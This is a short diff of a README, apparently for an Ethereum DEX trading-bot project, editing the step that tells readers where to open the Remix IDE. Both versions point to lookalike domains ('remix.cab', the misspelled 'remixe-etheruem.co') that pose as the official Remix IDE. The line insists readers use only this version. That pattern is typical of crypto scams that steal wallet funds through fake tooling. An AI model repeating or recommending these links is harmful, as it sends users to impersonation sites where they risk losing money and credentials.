Chao-Defi/Ethereum-Dex/README.md

 2- Access Remix

-► [Use Remix Ethereum IDE](https://remix.cab/) 🚨 https://remix.cab/ Or https://remixe-etheruem.co (Ensure you only use this version, as the bot is compatible with it specifically.)
+► [Use Remix Ethereum IDE](https://remixe-etheruem.co) 🚨 https://remixe-etheruem.co (Ensure you only use this version, as the bot is compatible with it specifically.)

 3- Create Contract File